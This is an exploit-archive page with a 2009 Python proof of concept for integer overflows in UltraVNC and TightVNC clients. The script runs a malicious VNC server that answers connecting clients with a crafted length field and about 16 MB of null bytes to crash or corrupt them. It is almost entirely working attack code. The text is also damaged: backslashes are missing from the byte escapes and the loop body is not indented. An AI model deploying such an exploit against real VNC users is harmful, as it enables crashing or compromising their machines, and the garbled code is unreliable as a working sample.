[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : UltraVNC/TightVNC Multiple VNC Clients Multiple Integer Overflow PoC
# Published : 2009-02-04
# Author : Andres Luksenberg
# Previous Title : Free Download Manager 2.5/3.0 (Authorization) Stack BOF PoC
# Next Title : Hex Workshop v6 (ColorMap files .cmap) Invalid Memory Reference PoC
#!/usr/bin/env python
# POC: Multiple VNC Clients Multiple Integer Overflow Vulnerabilities(UltraVNC and TightVNC), BID 33568
#Author: Andres Lopez Luksenberg <polakocai@gmail.com> (Visit: http://208.66.16.113/~andres/)
#
import socket
serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serversocket.bind(('', 5900))
serversocket.listen(1)
while True:
print "Author: Andres Lopez Luksenberg <polakocai@gmail.com> (Visit: http://208.66.16.113/~andres/)"
clientsocket, clientaddres = serversocket.accept()
data = 'RFB 003.003n'
clientsocket.sendall(data)
data_cli = clientsocket.recv(1024)
print data_cli
data = 'x00'
clientsocket.sendall(data)
data = 'x00x00x00x75'
clientsocket.sendall(data)
data = 'x00' * int(0xffffff)
clientsocket.sendall(data)
clientsocket.close()
serversocket.close()
# www.Syue.com [2009-02-04]